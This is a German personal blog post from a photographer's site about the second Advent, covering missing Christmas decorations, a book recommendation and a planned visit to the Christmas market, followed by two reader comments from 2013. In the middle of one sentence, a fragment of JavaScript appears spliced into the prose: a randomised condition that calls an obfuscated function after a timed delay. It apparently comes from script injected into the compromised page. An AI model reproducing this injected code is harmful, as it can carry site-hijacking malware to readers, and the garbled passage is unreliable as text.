Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Zweiter Advent

In meiner Wohnung kann man nur an meinem Adventskalender erahnen, welche Jahreszeit wir gerade haben. Dabei hatte ich genaue Vorstellungen, wie mein Reich wirken sollte – gemütlich und einladend. Lichterketten sollten längst meine Fenster zieren, ein kleiner künstlicher Weihnachtsbaum meine leere Ecke im Wohnzimmer schmücken und etwas weihnachtliche Dekoration meine Regale füllen. Und auch auf meiner Couch sollte ein Berg an gemütliche Kissen in weihnachtlichen Farben vorzufinden sein. Es sollte nach frisch gebackenen Plätzchen riechen und ich wollte bereits alle meine Weihnachtsgeschenkeinkäufe hinter mir haben.  Es sollte alles in allem weihnachtlich aussehen.

Die Wirklichkeit sieht leider etwas dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anders aus. Meine Fenster sind dekofrei. Es riecht allerhöchstens nach meinem Tee und die Ecke für den Weihnachtsbaum steht immer noch leer. Und auch die Weihnachtsgeschenke sind noch nicht besorgt. Ich gehöre wohl auch in diesem Jahr wieder zu den Menschen, die noch zwei Tage vor Weihnachten durch die Läden irren um das passenden Geschenk zu finden. Dabei mag ich solche Last-Minute-Einkäufe überhaupt nicht.

Fakt ist, es bleibt mir noch ein bisschen Zeit. Auch wenn es bei mir recht hektisch zu geht, soll mein Heim die Tage noch weihnachtlicher geschmückt werden. Diese Zeit des Jahres lädt ein, sich mit warmer Decke, Tee und einem spannenden Buch auf der Couch nieder zu lassen. Und so habe ich auch einmal ein bisschen die Seele baumeln lassen (meine Art der Weihnachtsstimmung?) „Ein ganzes halbes Jahr“ – eines der fesselsten Bücher, welches ich in diesem Jahr gelesen habe. Falls ihr noch eine Lektüre für die Feiertage benötigt: Dafür spreche ich eine klare Kaufempfehlung aus!

Und nun noch einmal über die Vorweihnachtszeit: Ich freue mich schon in der kommenden Woche auf den Besuch des Weihnachtsmarktes, auf einen großen Becher heißer Schokolade und dem Duft von frischen Crepes. Ich liebe es durch die wunderschön beleuchteten Weihnachtsmärkte zu schlendern und bin überzeugt, dass ich spätestens dann auch die Zeit nehmen werde, mein Heim erstrahlen zu lassen.

Und zu guter letzt: Morgen wird es dann auch wieder etwas lebendiger, denn ich bereite euch einen Blogbeitrag eines Familienshootings vor.

2 Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

  • Moni09/12/2013 - 12:33

    Heiße Schoki hört sich gut an ;) da komme ich doch gerne mit. Schade, dass du soweit wegwohnst :( fühl dich gedrückt.AntwortenCancel

  • Stefanie Reichel09/12/2013 - 08:43

    oh meine liebe… das kann ich gar nicht mit ansehen oder sagen wir mal lesen :). ich als total begeisterte deko-elli würde am liebsten vorbeischauen und dem abhilfe schaffen. hihi…. bald gibt es dann einen blogpost zu deiner weihnachtsdeko. ok? :*AntwortenCancel

Menu